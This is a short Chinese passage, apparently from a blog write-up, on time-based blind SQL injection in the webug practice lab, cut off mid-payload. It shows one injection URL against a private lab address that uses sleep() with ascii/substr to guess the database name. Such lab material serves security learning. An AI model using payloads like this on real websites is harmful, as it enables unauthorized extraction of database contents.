webug延時注入

通過之前的報錯可以得知sql語句 利用sleep()函數構造延時語句,發現頁面延遲響應 和布爾注入一樣,通過觀察頁面狀態來猜測數據庫名、表名等信息 爆當前數據庫名 http://192.168.199.143/control/sqlinject/bool_injection.php?id=1’and if(ascii(substr(database(),1,1))>118,1,sleep(5))%
相關文章
相關標籤/搜索